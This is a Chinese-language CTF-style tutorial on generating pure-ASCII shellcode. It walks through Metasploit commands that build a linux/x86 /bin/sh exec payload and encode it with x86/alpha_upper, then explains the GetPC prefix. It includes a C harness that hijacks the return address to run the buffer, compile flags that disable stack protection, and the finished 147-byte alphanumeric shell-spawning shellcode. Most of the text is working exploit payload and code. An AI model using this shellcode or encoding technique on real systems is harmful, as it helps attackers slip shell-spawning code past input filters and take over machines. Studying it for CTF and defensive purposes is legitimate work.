纯ascii的shellcode编写

上次ssctf决赛出现了一次纯ascii的shellcode

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIXYJKMK9ICD6DJT019BOB47P1YYE4LK2Q6PLK2VDLLKD6ELLKQVDHLK3N10LKWFGH0OR8SEJS1IS1N1KOM13PLKRLFD7TLKW5WLLK0TGXRXS1ZJLK1ZTXLKPZWPUQJKKS7D1YLKFTLK5QZN6QKOP1IPKLNLK49PCDC7YQ8O4MEQYWJKZTWK3L7T7X2UM1LK1JFDS1ZK3VLKDL0KLKPZ5LUQZKLKC4LKC1JHK9G47TELU1O3X238GY8TLIKULIYR58LNPNTNZL62M8MOKOKOKOMY0E34OK3N9HKRRSMWEL14F2ZHLNKOKOKOLIW53858RL2LQ0G1BHWCFRVN54CXD5T3E5BRK8QL6DTJK9M60VKOPUETLIYRF0OKI8OR0MOLLG5LVD62ZHE1KOKOKOE8BVCURR1HU8WPCCBED22HQ03TRND358RF42BORMCX2KU5CIQ03XCDRHSU10FQIKMXQL7TDWK9M3RHF810Q0WPBH3UU26Q522HP7U1P9SRU8GBWI56E12H6S07SSP1SXRE5153P9CXVV54CV56SX3S6TFY3R587FFYWFWGVQ9YLHPLGTQ0K9M101N2V20S61QBKON0FQIP0PKOPUTHAA

今天主要研究了一下这种shellcode的生成方法。

 

1.      Alpha shellcode

这种shellcode属于alpha shellcode，

https://code.google.com/p/alpha3/

有个工具alpha3不过不知道怎么使用，命令行比较复杂。

 

2.      用msfencode

Msf的编码器，使用命令

Msfencode –l可以查看所有的编码器。

X86/alpha_upper就是我们需要的加码器。

 

照着网上的方法进行shellcode生成和加码，不过老是报错：无效的命令。

msfpayload linux/x86/exec cmd="/bin/sh" | msfencode-e x86/alpha_upper -t c

没找到解决方法。

 

1.      看了下，问题是出在shellcode生成，直接改到msfconsole中生成一个shellcode保存到文件中。

Use payload/linux/x86/exec
Set cmd /bin/sh
Generate –t raw –f /home/shell.bin

 

进行加密

msfencode -e x86/alpha_upper -t c 

（-t参数后面跟的是语言c或python）

生成的shellcode的前几个字符依然有不是大写字母或者数字的。分析前几条指令，发现2-4这3条指令是进行重定位的，执行完pop ecx后，ecx=0804A042，即第2条指令的地址。（参考：http://www.programlife.net/shellcode-getpc.html）

将上面生成的shellcode做如下:将前0x16字节改成字符串，shellcode依然能执行（前提是eax执行到shellcode基址）

unsigned char buf[] = 
 //"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
 //"\x43\x43\x43\x43\x43
 "PYIIIIIIIIII"
 "\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
 "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
 "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
 "\x50\x38\x41\x43\x4a\x4a\x49\x53\x5a\x54\x4b\x31\x48\x4d\x49"
 "\x51\x42\x53\x56\x43\x58\x36\x4d\x55\x33\x4b\x39\x4d\x37\x43"
 "\x58\x56\x4f\x53\x43\x33\x58\x53\x30\x42\x48\x56\x4f\x42\x42"
 "\x45\x39\x52\x4e\x4c\x49\x4a\x43\x36\x32\x5a\x48\x35\x58\x35"
 "\x50\x53\x30\x43\x30\x46\x4f\x45\x32\x32\x49\x32\x4e\x46\x4f"
 "\x53\x43\x52\x48\x45\x50\x30\x57\x51\x43\x4b\x39\x4b\x51\x38"
 "\x4d\x4b\x30\x41\x41";

 

1.      Shellcode测试

 

test2.c                                                                                                                       
 #include
 
 unsigned char buf[] = 
 //"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
 //"\x43\x43\x43\x43\x43
 "PYIIIIIIIIII"
 "\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
 "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
 "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
 "\x50\x38\x41\x43\x4a\x4a\x49\x53\x5a\x54\x4b\x31\x48\x4d\x49"
 "\x51\x42\x53\x56\x43\x58\x36\x4d\x55\x33\x4b\x39\x4d\x37\x43"
 "\x58\x56\x4f\x53\x43\x33\x58\x53\x30\x42\x48\x56\x4f\x42\x42"
 "\x45\x39\x52\x4e\x4c\x49\x4a\x43\x36\x32\x5a\x48\x35\x58\x35"
 "\x50\x53\x30\x43\x30\x46\x4f\x45\x32\x32\x49\x32\x4e\x46\x4f"
 "\x53\x43\x52\x48\x45\x50\x30\x57\x51\x43\x4b\x39\x4b\x51\x38"
 "\x4d\x4b\x30\x41\x41";
 
 intmain()
 {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int) buf;
    return buf;
 }

 

编译命令:

gcc test.c -o test -fno-stack-protector -zexecstack

 

最终得到linux x86下的执行shell的shellcode:

147个字节大小

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA